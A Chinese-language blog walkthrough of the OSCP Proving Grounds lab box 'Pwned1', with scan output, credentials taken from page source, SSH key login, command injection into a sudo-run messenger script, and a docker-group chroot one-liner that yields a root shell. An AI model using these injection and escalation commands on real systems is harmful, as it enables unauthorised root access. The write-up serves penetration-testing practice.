OSCP - Proving Grounds - Pwned1

柴郡猫^O^

于 2025-05-09 15:22:32 发布

阅读量211

点赞数 4

CC 4.0 BY-SA版权

分类专栏： OSCP 文章标签：网络安全安全性测试安全

本文链接：https://blog.youkuaiyun.com/N61320/article/details/144178924

OSCP 专栏收录该内容

75 篇文章

订阅专栏

主要知识点

页面源代码查看
路径遍历
特殊组提权

具体步骤

依旧先Nmap收集一下信息,21,22,80端口开放，尝试了一下ftp匿名登录，失败，于是专注于80端口

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-01 23:48 UTC
Nmap scan report for 192.168.54.95
Host is up (0.0014s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fe:cd:90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e (RSA)
|   256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d (ECDSA)
|_  256 dd:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Pwned....!!
|_http-server-header: Apache/2.4.38 (Debian)

好像没有太多信息

所以先nikto吧,至少发现了一些路径 /nothing ,/robots.txt和/hidden_text，挨个查看一下

- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.54.95
+ Target Hostname:    192.168.54.95
+ Target Port:        80
+ Start Time:         2024-12-01 23:48:52 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /nothing/: Directory indexing found.
+ /robots.txt: Entry '/nothing/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /hidden_text/: Directory indexing found.
+ /robots.txt: Entry '/hidden_text/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 2 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: bf9, size: 5a9c7ca4a3440, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8104 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2024-12-01 23:49:12 (GMT0) (20 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

其中 /robots.txt就是包含了其他两个路径，并且其中/hidden_text比较有用，里面包含了一个名为secret.dic的字典文件，咱们可以利用它来爆破一下路径,并发现了一个路径

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.180.95
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                secret.dic
[+] Negative Status codes:   429,503,400,502,404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/pwned.vuln           (Status: 301) [Size: 321] [--> http://192.168.180.95/pwned.vuln/]
Progress: 23 / 24 (95.83%)
===============================================================
Finished
===============================================================

看起来是个登录页面，尝试了一下弱密码，无果，查看了一下源码发现了一些代码

并得到了用户名密码，看起来是ftp的

利用这一组用户名密码可以成功登录ftp服务,并且可以下载一个id_rsa的key文件，和一个note.txt文件，其中包含了一个人名

尝试用这个名字作为用户名，利用证书可以成功登录

C:\home\kali\Documents\OFFSEC\play\Pwn1> ssh -i id_rsa ariana@192.168.180.95
Linux pwned 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Dec  2 05:46:05 2024 from 192.168.251.180
ariana@pwned:~$ id
uid=1000(ariana) gid=1000(ariana) groups=1000(ariana),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
ariana@pwned:~$

执行sudo -l发现 ariana可以以selena的身份执行/home/messenger.sh,于是我们执行一下,至于message的内容，优先尝试命令注入

ariana@pwned:~$ sudo -l
Matching Defaults entries for ariana on pwned:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ariana may run the following commands on pwned:
    (selena) NOPASSWD: /home/messenger.sh

发现 selena的组是docker, 比较特别，借助GTFObins里的信息，docker组用户可以提权

ariana@pwned:~$ sudo -u selena /home/messenger.sh
ariana:
selena:
ftpuser:

Enter username to send message : ariana

Enter message for ariana :id

Sending message to ariana 
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)

Message sent to ariana :)

ariana@pwned:~$ sudo -u selena /home/messenger.sh
ariana:
selena:
ftpuser:

Enter username to send message : ariana

Enter message for ariana :docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Sending message to ariana 
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
# cat /root/proof.txt
2c37ee4169b5776588b7b9f3700356aa
#